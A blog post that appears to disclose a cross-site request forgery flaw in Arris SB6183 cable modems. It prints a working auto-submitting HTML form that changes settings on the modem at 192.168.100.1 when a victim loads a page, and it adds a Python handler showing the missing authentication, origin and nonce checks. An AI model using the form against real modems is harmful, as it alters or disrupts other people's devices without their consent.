Arris Modem Vulnerability – Updated 3/14
Arris is one of the largest providers of cable internet modems in the United States and around the world. I was playing around with this a bit tonight while bored and came up with a simple way to cause someone to reboot their modem just by visiting a page.
The configuration controls on Arris modems require no authentication and no human-interaction validation, so it is possible to force configuration changes simply by loading a page that submits a POST request to the modem. I have an example here: https://kalypto.org/ArrisTest/Arristocrap.html
This example is tested against the SB6183 and is able to make a few different changes. Even more is possible via silent changes on some of the Arris models that contain WiFi built into the device.
This is just a simple POST on docReady that submits the form to your modem. The modem takes just five parameters for configuring some basic settings. Because no authentication is required, you can force the change by having someone navigate to a page that has the form and the docReady call on it. Unless the user has their security set up to prevent cross-domain POST requests, it should work.
Here is the code in its entirety:
<FORM action="http://192.168.100.1/goform/RgConfiguration.pl" method="POST">
<input type="hidden" name="GetNonce" size=31 value="" />
<input type="hidden" name="EEE" size=31 value="1" />
<input type="hidden" name="TurnOffAllLeds_Cfg" size=31 value="1" />
<input type="hidden" name="ReceiveLed_Cfg" size=31 value="1" />
<input type="hidden" name="SendLed_Cfg" size=31 value="1" />
</FORM>
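The checks whose absence makes the form above work, written out as an added example (not code from this post or from Arris firmware): a configuration handler that requires an authenticated session, a same-origin request and a session-bound nonce in `GetNonce`. The per-boot secret, the session id, the HMAC nonce scheme and all function names are assumptions; only the `GetNonce` field name and the `192.168.100.1` address come from the post.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

# Assumptions (not from the post): a per-boot secret, an authenticated admin
# session id, and an HMAC-derived nonce carried in the form's GetNonce field.
SECRET = secrets.token_bytes(32)
ALLOWED_ORIGINS = {"http://192.168.100.1"}  # the modem's own admin origin

def issue_nonce(session_id):
    """Nonce the device embeds in the config form it serves to this session."""
    return hmac.new(SECRET, session_id.encode(), hashlib.sha256).hexdigest()

def request_origin(headers):
    """scheme://host[:port] taken from Origin, falling back to Referer."""
    parts = urlsplit(headers.get("Origin") or headers.get("Referer") or "")
    if parts.scheme and parts.netloc:
        return f"{parts.scheme}://{parts.netloc}"
    return ""  # missing header or the opaque origin "null"

def check_config_post(method, headers, form, session_id):
    """Return (allowed, reason) for a request to the configuration endpoint."""
    if method != "POST":
        return False, "method"
    if not session_id:
        return False, "unauthenticated"
    if request_origin(headers) not in ALLOWED_ORIGINS:
        return False, "origin"
    supplied = form.get("GetNonce", "").encode()
    if not hmac.compare_digest(supplied, issue_nonce(session_id).encode()):
        return False, "nonce"
    return True, "ok"

# Constructed sample: the auto-submitted form from the post, sent by a page on another site.
FORGED = {"headers": {"Origin": "https://other-site.example"},
          "form": {"GetNonce": "", "EEE": "1", "TurnOffAllLeds_Cfg": "1"}}

if __name__ == "__main__":
    sid = "constructed-session-id"
    print(check_config_post("POST", FORGED["headers"], FORGED["form"], sid))
    own = {"Origin": "http://192.168.100.1"}
    print(check_config_post("POST", own, {"GetNonce": issue_nonce(sid)}, sid))
```

Each check fails closed: a request with no `Origin` or `Referer`, or with the opaque origin `null`, is rejected the same way as one from another site.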
UPDATE: Arris has responded on Twitter. Their engineering team will be calling me on Thursday to discuss the issue. I hope to have some good results to share soon (and some more scripts that can be a little more dangerous).